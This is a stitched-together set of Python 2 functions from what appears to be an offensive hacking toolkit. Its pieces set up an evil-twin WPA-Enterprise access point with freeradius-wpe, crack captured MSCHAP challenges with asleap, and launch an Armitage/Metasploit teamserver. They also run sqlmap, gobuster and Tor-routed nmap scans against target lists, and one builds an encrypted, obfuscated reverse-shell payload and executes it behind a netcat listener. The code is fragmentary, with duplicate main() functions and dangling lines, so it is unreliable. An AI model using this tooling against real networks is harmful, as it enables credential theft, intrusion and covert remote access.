def write_hostapd_conf():
os.chdir("/root/ArmsCommander/logs/MGT_ENT_cracker/")
essid_str = str(
raw_input(
toolkits.yellow(
"Enter the ESSID ('name') you want the AP to be called: ")))
bssid_str = str(
raw_input(
toolkits.yellow(
"Enter the BSSID MAC address you want to be called: ")))
channel_str = str(
raw_input(toolkits.yellow("Enter what channel you want to use on: ")))
w = open("hostapd.conf", "w")
hostapd_conf_contents = """
interface=wlan0
driver=nl80211
ssid={0}
bssid={1}
logger_stdout_level=0
ieee8021x=1
eapol_key_index_workaround=0
own_ip_addr=127.0.0.1
auth_server_addr=127.0.0.1
auth_server_port=1812
auth_server_shared_secret=testing123
wpa=2
wpa_key_mgmt=WPA-EAP
channel={2}
wpa_pairwise=TKIP CCMP""".format(str(essid_str), str(bssid_str),
str(channel_str))
w.write(hostapd_conf_contents)
w.close()
print toolkits.green("Your new hostapd conf file is completed")
return
def launch_teamserver(login_parameters):
os.chdir('/usr/share/armitage')
public_ip = login_parameters[0]
teamserver_password = login_parameters[1]
print toolkits.green('PRE-FLIGHT: BEGINNING PRE-FLIGHT CHECKS')
print toolkits.yellow('PRE-FLIGHT: Starting up PostgreSQL server')
os.system('service postgresql start')
print toolkits.yellow('PRE-FLIGHT: Starting up Metasploit Service')
os.system('service metasploit start')
print toolkits.yellow('PRE-FLIGHT: Initializing Metasploit Database')
os.system('msfdb init')
print toolkits.green('LAUNCHING: Starting Metasploit Database')
os.system('msfdb start')
print toolkits.yellow(
'LAUNCHING: Killing all RUBY processes to shut down existing PIDs of msfrpc daemon'
)
os.system('killall ruby')
print toolkits.yellow(
'LAUNCHING: Killing any processes occupying PORT 55553')
os.system('fuser -k 55553/tcp')
print toolkits.green('Starting up Teamserver!')
cmd_str = """teamserver {0} {1}""".format(str(public_ip),
str(teamserver_password))
os.system(cmd_str)
return
def start_radius_server():
os.chdir("/root/ArmsCommander/logs/MGT_ENT_cracker/")
# root@Cylon-Raider:~# ifconfig wlan0 down
# root@Cylon-Raider:~# ifconfig wlan0 up
# root@Cylon-Raider:~# service network-manager stop
os.system('airmon-ng check kill')
os.system('nmcli nm wifi off')
os.system('nmcli radio wifi off')
os.system('rfkill list all')
os.system('rfkill unblock wlan')
os.system('ifconfig wlan0 down')
os.system('ifconfig wlan1 down')
os.system('service network-manager stop')
os.system('service freeradius-wpe stop')
os.system('ifconfig wlan0 up')
os.system('ifconfig wlan1 up')
# os.system('rfkill unblock all')
os.system('rfkill list all')
print toolkits.yellow("Waiting 3 seconds")
time.sleep(3)
os.system("gnome-terminal -e 'bash -c \"freeradius-wpe -X; exec bash\"'")
# os.system("hostapd ./hostapd.conf")
os.system(
"gnome-terminal -e 'bash -c \"hostapd ./hostapd.conf; exec bash\"'")
os.system(
"gnome-terminal -e 'bash -c \"Cylon_Raider_Main.py; exec bash\"'")
return
def collect_teamserver_creds(save_file):
os.chdir('/root/ArmsCommander/remoteexploits/project_foreplay')
login_parameters = [
str(
raw_input(
toolkits.yellow(
"Enter the PUBLIC IP address of your will-be Armitage Teamserver: "
))),
str(
raw_input(
toolkits.yellow(
"Enter the PASSWORD you wish to share with your Armitage Teammates: "
)))
]
public_ip = login_parameters[0]
teamserver_password = login_parameters[1]
login_parameters_str = "{0},{1}".format(public_ip, teamserver_password)
w = open(save_file, 'w')
w.write(login_parameters_str)
w.close()
launch_teamserver(login_parameters)
return
def main():
print toolkits.yellow("""
SQLMAP OPTIONS:
\tLIST: Get a database list of the target URL (or URLs)
\tEDIT: Edit the wordlist of targeted URLs
\tEXIT: Exit program
""")
opt_choice = str(raw_input(toolkits.yellow("Enter a COMMAND: ")))
if opt_choice == "LIST":
os.system('clear')
read_target_list(wordlist)
main()
elif opt_choice == "EDIT":
os.system('clear')
edit_wordlist()
main()
elif opt_choice == "EXIT":
exit(0)
else:
os.system('clear')
print toolkits.red("You have entered a invalid option")
main()
return
def main():
decryptKey = generateKey()
decryptIV = generateIV()
code = read_template()
template_reverse_shell
payloadNoEncrypt = template_reverse_shell.splitlines()
shuffledPayload = commandSegmentationTech(payloadNoEncrypt)
# writableLines = convertIntoLines(shuffledPayload)
l_encrypted = cryptor(shuffledPayload, decryptKey, decryptIV)
outfile = writeUniquePayload(code, l_encrypted, decryptKey, decryptIV)
print red("DEBUG: Shuffled payload\r\n{}".format(str(shuffledPayload)))
out = b64encode(l_encrypted)
print yellow("DEBUG: Encrypted payload\r\n{}".format(str(out)))
print green("DEBUG: Payload generated at\r\n{}".format(str(outfile)))
rp = open(outfile, 'rb+')
uniquePayload = rp.read()
print red("DEBUG: Contents of {}\r\n".format(str(outfile)))
print yellow(uniquePayload)
print cyan("Opening netcat session")
os.system("""gnome-terminal -e 'bash -c "nc -nvlp {}"'""".format(
str(LPORT)))
print green("You may run the payload with\r\npython {}".format(
str(outfile)))
time.sleep(2)
print green("Executing payload")
os.system("python {}".format(str(outfile)))
return
def jkd_poc():
# remember to import toolkits
print toolkits.yellow(
"DO NOT CLOSE THIS WINDOW! \nLet this process run when their scans hit you"
)
os.system(
"gnome-terminal -e 'bash -c \"python /root/ArmsCommander/networkdefenses/JKD_poc.py; exec bash\"'"
)
return
def readIntermediaryFile(interFile):
r = open(interFile, 'rb+')
shuffledPayload = str(r.read()).strip().rstrip()
print yellow(
"DEBUG: function=readIntermediaryFile(interFile) contents\r\n{}".
format(str(shuffledPayload)))
r.close()
shredIntermediaryFile(interFile)
return shuffledPayload
def reconstituteLine(shuffledLine,arrayMap):
cmd=""
print red("DEBUG: Shuffled Line to Reconstitute\r\n{}".format(shuffledLine))
print yellow("DEBUG: arrayMap to reconstitute the payload\r\n{}".format(arrayMap))
for indice in arrayMap:
cmd = "{}{}".format(str(cmd),str(shuffledLine[indice]))
print green("DEBUG: Reconstituted Command:\r\n{}".format(str(cmd)))
return cmd
def shredIntermediaryFile(interFile):
cmd = "shred {}".format(str(interFile))
p = subprocess.Popen(cmd,
shell=True,
executable='/bin/bash',
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
print yellow(
"DEBUG: function=shredIntermediaryFile(interFile) ran \r\n\t".format(
str(cmd)))
return
def pexpect_thread(cmd):
encoding = 'utf-8'
time = timer_thread()
# #timesup = False
thread = pexpect.spawn(cmd, timeout=300)
# fout = 'airodump.log'
# thread.logfile = fout
# #thread.logfile_read = sys.stdout
# thread.write()
dogass = 'f**k you pexpect module'
dogass = dogass.decode('utf-8')
outcomes = thread.expect([pexpect.TIMEOUT, pexpect.EOF, dogass])
# time.sleep(5)
# outcomes = pexpect.TIMEOUT
if (outcomes == 0): # out of time
print green("pexpect.TIMEOUT condition reached")
results = thread.read()
thread.terminate()
w = open('./airodump.log')
w.write(results)
w.close()
# logfile = thread.logfile
elif (outcomes == 1
): # end of file error, just send another line to throw it into loop
print yellow("pexpect.EOF conditioning reached")
thread.sendline('\n')
# elif(outcomes==2):
# results = thread.read()
# thread.terminate()
# w = open('./airodump.log')
# w.write(results)
# w.close()
elif (outcomes == 2):
print green("Woo, the variable is dog-ass")
print yellow("Thank you so much for wasting my time.")
results = thread.read()
thread.terminate()
w = open('./airodump.log', 'a+')
w.write(results)
w.close()
else:
exception = thread.read()
exception = str(exception.encode('utf-8')).strip().rstrip()
print exception
x = open('./exceptions_threading.log', 'a+')
x.write(exception)
x.close()
return results, outcomes, exceptions
def main():
print "MassGoBuster. Automatically run gobuster against a wordlist of host,port.\r\nComing soon: Threading by running 5 gobuster processes at a time."
if len(sys.argv) < 2:
print toolkits.yellow(
"Usage:\r\npython massgobuster.py <wordlist of host,ports> <wordlist of paths> <OPTIONAL: threads, default=10>"
)
print toolkits.cyan(
"\r\nEXAMPLE: python massGoBuster.py targetHostPort.txt /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt 50\r\nEXAMPLE EFFECT: Runs GoBuster at a rate of 50 threads against each target,port combo found in the list of targets using the wordlist"
)
exit(0)
else:
inputFile = sys.argv[1]
readInputFile(inputFile)
return
def main():
print toolkits.cyan("""
\n\n\n
\t\tForeplay, EZ-Mode Armitage Teamserver Collaboration Menu
\n\t\t\t\tCOMMANDS\n
LAUNCH - Launch the Armitage Teamserver using NEW CREDENTIALS
LOAD - Load PREVIOUSLY SAVED CREDENTIALS and launch a teamserver from that
EXIT - Exit program
""")
opt_choice = str(raw_input(toolkits.yellow("Enter a COMMAND: ")))
if opt_choice == "LAUNCH":
collect_teamserver_creds(save_file)
main()
elif opt_choice == "LOAD":
load_saved_teamserver_creds(save_file)
main()
elif opt_choice == "EXIT":
print toolkits.red('Received exit command, exiting!')
exit(0)
else:
print toolkits.red(
'You have entered a invalid option, please try again')
main()
return
def main():
print """
\t#1. Start the FreeRADIUS server, the HostAPD access point, and Cylon-Raider
\t#2. EDIT the temporary hostapd configuration file
\t#3. DUMP logs for FreeRADIUS Wireless Pawn Edition
\t#4. CRACK the challenge response strings to find the password
### Alternative Commands ###
# 666. SETUP - Install the required components to conduct this attack
"""
opt_choice = int(raw_input(toolkits.yellow("Enter a OPTION: ")))
if opt_choice == 1:
start_radius_server()
main()
elif opt_choice == 2:
write_hostapd_conf()
main()
elif opt_choice == 3:
dump_challenge_response()
main()
elif opt_choice == 4:
crack_challenge_response()
main()
elif opt_choice == 666:
setup_freeradius()
main()
else:
print toolkits.red("You have entered a invalid option")
main()
return
def crack_challenge_response():
#asleap -C <challenge> -R <response> -W <dictionary>
challenge_str = str(
raw_input(
toolkits.yellow(
"Enter the CHALLENGE STRING found in the logfile: ")))
response_str = str(
raw_input(toolkits.yellow("Enter the RESPONSE STRING: ")))
dictionary_file = str(
raw_input(
toolkits.yellow("Enter the location of your DICTIONARY FILE: ")))
cmd_str = "asleap -C {0} -R {1} -W {2}".format(str(challenge_str),
str(response_str),
str(dictionary_file))
os.system(cmd_str)
return
def read_target_list(wordlist):
list_of_strings = "{0}".format(str(wordlist))
r = open(list_of_strings, 'r')
# line = r.readline()
row_number = 1
r = open(list_of_strings, 'a+')
with open(list_of_strings, 'a+') as r:
line = r.readline()
sentence = str(line.strip())
row_number = 1
for sentence in r:
if sentence != "":
try:
target_str = sentence.strip()
print 'DEBUG: %s' % target_str
get_db_list(target_str)
except:
print toolkits.yellow(
"All target possible databases scanned")
return
def yellow(string):
string = toolkits.yellow(string)
print string
return string
import sys
import operator
import toolkits
os.chdir('/root/ArmsCommander/remoteexploits/project_foreplay')
save_file = './saved_login_parameters.txt'
print toolkits.yellow("""
\n
USAGE WARNING:
Please be sure to open up ports 55553 (preferably port range 55550 to 55559)
on your router and/or software firewalls!
Armitage Teamserver, and Metasploit RPC are dependent on...
1. Port 55553 for the remote login server (listener)
2. Port 55554 for MSG-RPC
3. Port 55552 for MSFRPC Daemon
4. And who knows how many other RPC processes you are already running
For the love of God, do not use your HOME NETWORK for Hacker Team Collaborations!
Go get a upgraded Amazon AWS instance that is DISPOSABLE.
You can control the firewall configurations there by setting "Security Groups" and then reboot the instance.
""")
def launch_teamserver(login_parameters):
os.chdir('/usr/share/armitage')
public_ip = login_parameters[0]
teamserver_password = login_parameters[1]
print toolkits.green('PRE-FLIGHT: BEGINNING PRE-FLIGHT CHECKS')
def initial_scan(target_list):
resource_file_default = '/tmp/resource_file_default.rc'
print toolkits.cyan("Your selected target list file is {0}".format(
str(target_list)))
workspace = str(raw_input("Enter your Metasploit WORKSPACE: "))
if workspace == "" or None:
workspace = "default"
else:
pass
# restarts tor
TOR_restart_cmd = "service tor restart"
os.system(TOR_restart_cmd)
save_file_location = "/root/Documents" # default nmap xml saved files location
# asks user for a list of targets he wants to scan as a simple text file with one IP address or hostname per line
# these are all of the enumeration scripts
enum_scripts = """ajp-headers.nse,http-headers.nse,http-security-headers.nse,http-server-header.nse,cics-enum.nse,cics-user-enum.nse,citrix-enum-apps.nse,citrix-enum-apps-xml.nse,citrix-enum-servers.nse,citrix-enum-servers-xml.nse,dns-nsec3-enum.nse,dns-nsec-enum.nse,dns-srv-enum.nse,domino-enum-users.nse,eppc-enum-processes.nse,http-domino-enum-passwords.nse,http-drupal-enum.nse,http-drupal-enum-users.nse,http-enum.nse,http-gitweb-projects-enum.nse,http-svn-enum.nse,http-userdir-enum.nse,http-wordpress-enum.nse,krb5-enum-users.nse,msrpc-enum.nse,mysql-enum.nse,ncp-enum-users.nse,nrpe-enum.nse,omp2-enum-targets.nse,oracle-enum-users.nse,rdp-enum-encryption.nse,sip-enum-users.nse,smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-mbenum.nse,smtp-enum-users.nse,ssh2-enum-algos.nse,ssl-enum-ciphers.nse,tftp-enum.nse,tso-enum.nse,vtam-enum.nse"""
# generates random time str to make the .xml file unique
timestr = timestr = time.strftime("%Y%m%d-%H%M%S")
# runs scans in this order, FIN, XMAS, and COMPREHENSIVE
# the problem is that
# we cannot multiplex additional commands into msf console with the -x option
# the resource file option is slow as f**k.
FIN_scan_cmd = """db_nmap -v -O -sF -Pn -T4 -O -F -oX {2}/FIN_initial_scan_{3}.xml --script={0} nmap --min-hostgroup 50 --max-hostgroup 1024 --min-parallelism 10 --max-parallelism 20 --host-timeout 30s -iL {1}""".format(
str(enum_scripts), str(target_list), str(save_file_location),
str(timestr))
#timestr = timestr = time.strftime("%Y%m%d-%H%M%S")
XMAS_scan_cmd = """db_nmap -v -O -sX -Pn -T4 -O -F -oX {2}/XMAS_initial_scan_{3}.xml --script={0} nmap --min-hostgroup 50 --max-hostgroup 1024 --min-parallelism 10 --max-parallelism 20 --host-timeout 30s -iL {1}""".format(
str(enum_scripts), str(target_list), str(save_file_location),
str(timestr))
#timestr = timestr = time.strftime("%Y%m%d-%H%M%S")
COMPRE_scan_cmd = """db_nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 -oX {2}/COMPRE_initial_scan_{3}.xml --script={0} nmap --min-hostgroup 50 --max-hostgroup 1024 --min-parallelism 10 --max-parallelism 20 --host-timeout 30s -iL {1}""".format(
str(enum_scripts), str(target_list), str(save_file_location),
str(timestr))
# runs all of these commands immediately after metasploit starts up.
MSF_cmd = "workspace -a {0};setg WORKSPACE {0};{2};resource {1}".format(
str(workspace), str(resource_file_default), str(FIN_scan_cmd))
print toolkits.yellow("""
DEBUG: db_nmap lines
{0}
""").format(str(MSF_cmd))
time.sleep(3)
db_nmap_resource_file = """
use auxiliary/server/socks4a
run -j
{0}
{1}
{2}
""".format(str(FIN_scan_cmd), str(XMAS_scan_cmd), str(COMPRE_scan_cmd))
print toolkits.yellow("""
DEBUG: Resource file content
{0}
""").format(str(db_nmap_resource_file))
w = open(resource_file_default, 'w')
w.write(db_nmap_resource_file)
w.close()
print toolkits.yellow("""
DEBUG: Location of resource files
{0}
""").format(str(resource_file_default))
debug_str = """ls -la {0}""".format(str(resource_file_default))
bash_command(debug_str)
host_cidr_range = ''
darkoperator_resource_file = """
workspace {0}
load pentest
network_discovery -d -v -r {1}
""".format(str(workspace), str(host_cidr_range))
MSF_cmd_exec(MSF_cmd)
return MSF_cmd, resource_file_default
